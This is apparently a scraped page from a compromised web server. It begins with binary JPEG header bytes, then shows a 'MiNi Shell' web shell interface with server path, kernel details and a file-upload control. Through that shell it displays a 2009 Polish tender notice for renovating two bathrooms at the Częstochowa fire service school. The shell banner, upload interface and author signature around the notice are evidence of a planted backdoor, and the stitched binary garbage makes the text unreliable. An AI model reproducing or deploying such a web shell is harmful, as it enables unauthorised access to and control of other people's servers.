JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090408/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090408/97290-N-2009.html

<p class="kh_header"><b>Częstochowa: Wykonanie remontu dwóch pomieszczeń sanitarnych w Centralnej Szkole Państwowej Straży Pożarnej w Częstochowie</b><br>
<b>Numer ogłoszenia: 97290 - 2009; data zamieszczenia: 08.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centralna Szkoła Państwowej Straży Pożarnej , ul. Sabinowska 62/64, 42-200 Częstochowa, woj. śląskie, tel. (034) 378 53 00, 378 53 01, faks (034) 378 53 32.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cspsp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samodzielna Państwowa Jednostka Organizacyjna Nie Posiadająca Osobowości Prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie remontu dwóch pomieszczeń sanitarnych w Centralnej Szkole Państwowej Straży Pożarnej w Częstochowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie remontu dwóch pomieszczeń sanitarnych w Centralnej Szkole PSP w Częstochowie. Pełny zakres prac objętych niniejszym zamówieniem, przedstawiają załączniki nr 1 i 1.1 do SIWZ.Wykaz prac do wykonania w łazienkach budynków: stołówki -znajdującej się przy głównym wejściu oraz budynku dydaktyczno-koszarowego - w części dydaktycznej, na drugim piętrzę przy auli nr 1. Łazienka w budynku dydaktyki: 1.Skłucie płytek ceramicznych-35,5 m2, 2.Wyburzenie ścianek działowych-0,64 m3, 3.Demontaż sufitu podwieszanego panelowego-9,9 m2, 4.Montaż sufitu podwieszanego K-G-9,9 m2, 5.Wymiana futryny wraz z skrzydłem drzwiowym szt., 6.Montaż płytek ceramicznych -45,5 m2, 7.Wymiana grzejnika -1 szt., 8.Wymiana kratki odpływowej -1 szt., 9.Demontaż i ponowny montaż nowej suszarki do rąk (zasilanie schować w ścianie) -1szt., 10.Demontaż i ponowny montaż nowego podgrzewacza wody (zasilanie schować w ścianie)-1 szt., 11.Demontaż istniejącej umywalki, montaż nowej umywalki(wraz z osprzętem)-1 szt., 12.Demontaż istniejącego sedesu i montaż nowego sedesu w zabudowie (wraz z osprzętem)-2 szt., 13.Wkłucie rury PCV w ścianę -2,5 mb, 14.Montaż lustra naściennego licowanego z płytkami (wym.09x08m) -1 szt., 15.Oświetlenie-4 oczka, 1 podwójny kinkiet nad lustrem, 16.Wymiana i obróbka kratki wentylacyjnej, zamontowanie wentylatora-1 szt., 17.Montaż ścianek działowych systemowych -2 kabiny z drzwiami, 18.Pojemnik na mydło (dozownik) - 1szt., Uchwyt na ręcznik papierowy- 1szt., Szczotka do WC- 2szt., Uchwyt na papier toaletowy- 2 szt., 19.Montaż kontaktów -1 szt., Łazienka w budynku stołówki:1.Skłucie płytek ceramicznych20,7 m2, 2.Wyburzenie ścianek działowych-0,24 m3, 3.Montaż sufitu podwieszanego K-G- 5 m2, 4.Demontaż futryny wraz z skrzydłem drzwiowym- 1szt. skrzynkowa futryna, Montaż futryny wraz z skrzydłem drzwiowym3 szt.,5.Montaż płytek ceramicznych -24,6m2, 6.Wymiana kratki odpływowej - 1 szt., 7.Montaż suszarki do rąk (zasilanie schować w ścianie) -1 szt., 8.Przeniesienie włącznika światła - 1szt.,  Dostawienie gniazdka-1 szt., 9.Demontaż istniejącej umywalki, montaż nowej umywalki -(wraz z osprzętem) -1 szt., 10.Demontaż istniejącego sedesu i montaż nowego sedesu w zabudowie (wraz z osprzętem) 2 szt. - demontaż 1 szt. - montaż, 11., Montaż lustra naściennego licowanego z płytkami (wym.09x07m) -1 szt., 12.Oświetlenie- 4 oczka,  1 szt. kinkiet 13.Wymiana i obróbka kratki wentylacyjnej, zamontowanie wentylatora 1 szt., 14.Wymiana drzwi wejściowych-1 szt.Poniższy opis określa parametry techniczne, wymagania jakościowe dotyczące montowanych urządzeń i wykorzystywanych do remontu  materiałów oraz zasady wykonania i odbioru robót. Wykonanie remontu obejmuje zakup, dostawę materiałów i urządzeń, wykonawstwo robót remontowych, instalacyjnych, montaż urządzeń i osprzętu oraz wszelkie prace demontażowe  i przygotowawcze. Materiały pochodzące z demontażu Wykonawca zobowiązany jest wywieźć i zutylizować. Prace wykonać zgodnie z sztuką budowlaną, obowiązującymi zasadami wiedzy technicznej, Prawem budowlanym oraz zasadami BHP. Po zakończeniu robót Wykonawca zobowiązany  jest złożyć kartę gwarancyjną, atesty, certyfikaty, dopuszczenia dla materiałów i urządzeń potwierdzone za zgodność. Ustęp i umywalkę w łazienkach należy wykonać w zabudowie na stelażach montażowych (w technologii GEBERIT lub równoważnej). W łazienkach na ścianach ułożyć płytki ceramiczne w formacie 25x33,3cm, a na podłodze płytki w wymiarze 33,3x33,3cm. Płytki w kolorystyce delikatnego kremu i zieleni z motywem  dekoracyjnym wokół lustra (proponowana kolekcja Bambus - Paradyż). Nad umywalką zamontować lustro o wymiarach 90x80cm w łazience w budynku dydaktycznym i lustro o wymiarach 90x70cm w łazience na stołówce. Oba lustra fazowane po obwodzie, zlicowane z płytkami ściennymi. Parametry płytek:- klasa ścieralności - min. 3, wytrzymałość na zginanie - min.35 MPa- nasiąkliwość wodna - <4%- odporna na pęknięcia włoskowate, Miski ustępowe o wymiarach min. 570x360mm wyposażyć w pneumatyczną armaturę spłukującą, przycisk uruchamiający chromowany, wolno opadającą deskę z duroplastu antybakteryjnego lub ABS. W łazienkach należy zainstalować umywalki (z półpostumentem) o wymiarach minimalnych 550x430mm z otworem przelewowym i zaworem spustowym w przycisku wyposażyć ją w syfon oraz baterię sztorcową, chromowaną. Parametry baterii :- długość - min.105mm- wysokość wylewki - min. 43mm- jednodzwigniowa- mieszakowa-ruchomy perlator - rodzaj podłączenia - wężyki. Do urządzeń sanitarnych należy doprowadzić wodę, podejścia zakończyć zaworkami.  Podłączenie wody do baterii umywalki w budynku dydaktycznym wykonać przez elektryczny  podgrzewacz przepływowy o mocy min.6kW. Łazienki doposażyć w uchwyt na papier, uchwyt na ręcznik papierowy, dozownik na mydłow płynie do dolnego bezdotykowego dozowania mydła, szczotkę do WC. Obudowy i pokrywy w/w elementów metalowe chromowane, alumioniowe lub ze stali nierdzewnej bądź polerowanej.Armatura sanitarna w kolorze białym (Cersanit, Koło, Roca lub równoważne). Sufity :  W łazienkach należy wykonać sufity podwieszone w technologii karton-gips na pojedynczym ruszcie  metalowym (zamawiająca dopuszcza wykonanie sufitu podwieszanego na podwójnym ruszcie). Wymagane są wieszaki metalowe i elementy mocujące (kołki) właściwe dla w.w technologii z atestem. Płyty gipsowe grubości 9-12mm. W łazienkach należy zastosować płytę K-G wodoodporną. Sufity spoinować i zbroić wg. technologii wykonania suchych tynków. Malować minimum dwa razy na kolor biały, akrylową farbą lateksową o parametrach-wymagania dotyczące farb :Wygląd powłoki - matowy, Kolor - biały, Gęstość, 20?0,5oC, [g:cm3] - nie więcej 1.600, Zawartość części stałych, [%wag] - co najmniej 50,0, Ilość warstw - min.2,  Czas schnięcia powłoki, 23o?2oC, [h] - 2, Sposób nanoszenia - wałek. Wymagania dotyczące oświetlenia: - oprawa wpuszczana w sufit, z możliwością regulacji źródła światła, wykonana z odlewu aluminiowego- jako źródło światła żarówki energooszczędne o maksymalnej mocy 50W -szczelność  IP20-I klasa ochronności przed porażeniem-montaż na powierzchniach normalnie palnych-zgodność z CE. Wymagania dotyczące kabin sanitarnych: - materiał - laminat kompaktowy o grubości min. 13mm- kolorystyka nawiązująca do kolorystyki płytek ściennych- elementy mocujące aluminiowe - okucia z wysokiej jakości tworzyw. Wyposażenie: dwa zawiasy (jeden samozamykający), uchwyt, zamek.Wysokość konstrukcji: 200 cm.- prześwit dolny 10-15cm- nóżki metalowe, Kabiny winny być odporne na działanie wilgoci, na powierzchni nie powinien osiada brud, glony ani zarodniki grzybów. Płyty powinny być odporne na uderzenia, ścieranie, zadrapania, działania środków chemicznych, niepalne i nietoksyczne.W łazience w budynku stołówki należy zamontować drzwi drewniane analogiczne do drzwi w sąsiedniej łazience, natomiast drzwi wejściowe do łazienki w budynku dydaktyczno-hotelowym nr1 należy wykonać w podobnej kolorystyce jak drzwi do sal na korytarzach budynku. Drzwi do łazienki w budynku stołówki należy wykonać z wykorzystaniem futryny skrzynkowej. Wykonawca nie może wykorzystywać błędów i omyłek specyfikacji o zaistniałych powiadomić zamawiającego.Roboty zanikające wymagają odbioru przed ich zakryciem.Odbiory robót odbywać się będą w obecności inspektora nadzoru zamawiającego po pisemnym zgłoszeniu. Wykonawca odpowiada za jakość, prawidłowość i terminowość wykonanych prac.Wykonawca odpowiada za powstałe w wyniku jego działalności szkody. Jeśli Wykonawca nie będzie używał mediów zamawiającego zaznaczy to w pisemnym oświadczeniu inaczej zobowiązany jest ponosić koszty zużytej wody i energii. Wykonawca ma obowiązek dokonać własnych oględzin przedmiotu zamówienia, dokonać własnych obmiarów robót, zakres prac skonsultować z zamawiającym oraz złożyć stosowne oświadczenie. Zamawiający wymaga minimum 3-letnigo okresu gwarancyjnego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wymagane jest zabezpieczenie oferty wadium w wysokości 1.000,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego mogą się ubiegać wykonawcy, którzy spełniają postanowienia art. 22 ust. 1pkt 1-4 tj.:
1)Posiadają uprawnienia do wykonywania określonej działalności lub czynności dotyczącej przedmiotu objętego zamówieniem, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 2)Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 3)Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia, oraz: 5)Są uprawnieni do występowania w obrocie prawnym, zgodnie z wymaganiami ustawowymi;6)Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia między innymi na podstawie art. 24 ust. 1 i 2 prawa zamówień publicznych, oraz spełniają warunki określone w niniejszej SIWZ; 7)Wnieśli wymagane wadium przed upływem terminu składania ofert. W celu potwierdzenia spełnienia warunków Zamawiająca żąda od wykonawców oświadczeń i dokumentów niezbędnych do przeprowadzenia postępowania, wymienionych w poniższej tabeli, następnie dokona oceny spełnienia warunków poprzez określenie spełnia lub nie spełniana podstawie kryteriów zapisanych w specyfikacji iwz..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)Wypełniony, ostemplowany i podpisany przez Wykonawcę lub osobę(y) upoważnioną(e) do reprezentowania firmy formularz OFERTOWY wykonany wg wzoru stanowiącego ZAŁĄCZNIK Nr 0 do siwz. Dopuszcza się wypełnienie formularza sporządzonego przez Zamawiającą, pod warunkiem, iż będzie on czytelny. Dokument musi zostać złożony w formie oryginału. 2)Szczegółowy opis przedmiotu zamówienia, zaparafowany i podpisany przez osobę upoważnioną ze strony Wykonawcy - ZAŁĄCZNIK Nr 1 do SIWZ - oryginał, oraz przedmiar robót, zaparafowany i podpisany przez osobę upoważnioną ze strony Wykonawcy - ZAŁĄCZNIK Nr 1.1 do SIWZ. Dopuszcza się złożenie załączników sporządzonych przez Zamawiającą, pod warunkiem, że będą one czytelne. Treść załączników musi być tożsama z treścią załączników sporządzonych przez Zamawiającą. 3)oświadczenie zgodne z art. 22 ust. 1 prawa zamówień publicznych (wg wzoru - ZAŁĄCZNIK Nr 2do siwz), złożone w formie oryginału ostemplowane i podpisane przez osobę(y) uprawnioną(e). 4)Oświadczenie zgodne z art. 24 prawa zamówień publicznych (wg wzoru - ZAŁĄCZNIK Nr 3 do siwz), złożone w formie oryginału ostemplowane i podpisane przez osobę(y) uprawnioną(e). 5)Odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, złożone w formie oryginału lub kserokopii. Kserokopia winna zostać potwierdzona za zgodność z oryginałem. Dokument wystawiony nie wcześniej niż 6 miesięcy przed terminem składania ofert.
6)Upoważnienia lub pełnomocnictwa uprawniające osobę(y) podpisujące ofertę do jej podpisania w imieniu firmy składającej ofertę, o ile nie wynika to z przepisów prawa lub z dokumentów, złożone w formie oryginału dokumentu lub kserokopii pełnomocnictwa udzielonego w obecności notariusza potwierdzona za zgodność z oryginałem przez osobę upoważnioną. Z dokumentu musi wynikać zakres udzielonego pełnomocnictwa. 7)W przypadku podmiotów występujących wspólnie, w celu wspólnego ubiegania się o zamówienie i ustalenia pełnomocnika należy zaznaczyć, które podmioty występują wspólnie, oraz przedstawić pełnomocnictwo dla osoby reprezentującej te podmioty. Oryginał, z treści którego musi wynikać sposób reprezentacji w niniejszym postępowaniu. (Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia. Zamawiająca wymaga od podmiotów występujących wspólnie potwierdzenia powyższego przez złożenie oświadczeń). 8)Uchwałę wspólników zgodnie z art. 230 kodeksu spółek handlowych. Dotyczy Wykonawców  zarejestrowanych jako Sp. z o.o. i przypadków, w których taka uchwała jest wymagana tj. gdy cena oferty przekracza dwukrotną wartość kapitału zakładowego spółki. W celu potwierdzenia odpowiedniego umocowania do złożenia oferty wykonawca winien złożyć kopię takiej uchwały wspólników w przedmiotowym zakresie, złożoną w formie oryginału lub kserokopii potwierdzonej za zgodność z oryginałem. 9)Dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie posiadają wymagane uprawnienia, jeżeli przepisy prawa nakładają obowiązek posiadania takich uprawnień. Oryginał lub kserokopia dokumentów, których każda strona musi zostać poświadczona za zgodność z oryginałem. Z treści dokumentów musi wynikać posiadanie odpowiednich (niezbędnych) uprawnień oraz  przynależność do Izby Inżynierów Budownictwa. 10)Dowód wniesienia wadium przed upływem terminu składania ofert. Kwota wadium odpowiadać musi żądaniom określonym w pkt. 12.1  SIWZ. Forma wniesienia wadium musi odpowiadać postanowieniom pkt.12.2 SIWZ. W przypadku wniesienia wadium w pieniądzu, dokument złożony w formie oryginału lub kserokopii dowodu wpłaty poświadczonej za zgodność z oryginałem przez osobę(y) uprawnioną(e). W pozostałych przypadkach Zamawiająca dopuszcza wpięcie w ofertę potwierdzonej kopii dowodu wniesienia wadium w formie innej niż pieniądz. W takim przypadku oryginał tegoż dokumentu musi być dołączony do oferty luzem i złożony w kopercie, wraz z ofertą. Wadium musi obejmować termin związania ofertą tj. 30 dni od terminu składania ofert. Kopia dowodu wpłaty winna zostać poświadczona za zgodność z oryginałem przez osobę(y) uprawnioną(e). 11)Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wielkości, wartości, przedmiotu, dat i miejsca wykonania i zleceniodawców. Dokument, złożony w oryginale. Zamawiająca wymaga, aby dokument ten potwierdzał, że Wykonawca wykonał, w okresie ostatnich pięciu lat, minimum trzy roboty budowlane odpowiadające swoim rodzajem i wartością przedmiotowi zamówienia w niniejszym postępowaniu tj. wykonał remont pomieszczeń sanitarnych. Wartość wykonanych robót: minimum 3 pomieszczenia sanitarne, na kwotę minimum 10.000,00 zł brutto każde pomieszczenie sanitarne- wg wzoru - ZAŁ. Nr 4 do siwz, 12)Dokumenty (referencje) potwierdzające, że roboty budowlane, o których mowa powyżej, zostały wykonane należycie. Dokumenty złożone w oryginale lub kserokopii potwierdzonej za zgodność z oryginałem, wystawione przez zleceniodawcę robót budowlanych. Zamawiająca wymaga minimum trzech dokumentów, potwierdzających należyte wykonanie zamówienia na roboty budowlane wykazane w wykazie, których skrócony opis został określony powyżej. Dokumenty winny być wystawione przez zleceniodawcę robót. 13)Oświadczenie dotyczące powierzenia wykonania części zamówienia podwykonawcom, wykonane według wzoru stanowiącego ZAŁĄCZNIK Nr 5 do siwz. Dokument złożony w formie oryginału, wypełniony, ostemplowany i podpisany przez osoby upoważnione do reprezentowania wykonawcy. Wykonawca winien załączyć ten dokument do oferty w przypadku zatrudniania podwykonawców. 14)Polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. Z dokumentu musi wynikać, iż wykonawca posiada aktualne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum 50.000 złotych. Dokument w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - Gwarancja jednolita - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.cspsp.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sabinowska 62/64, Częstochowa, Budynek administracyjny pok. 15.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2009 godzina 12:00, miejsce: ul. Sabinowska 62/64, 42-200 Częstochowa, Sekretariat Komendanta w Budynku Administracyjnym.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com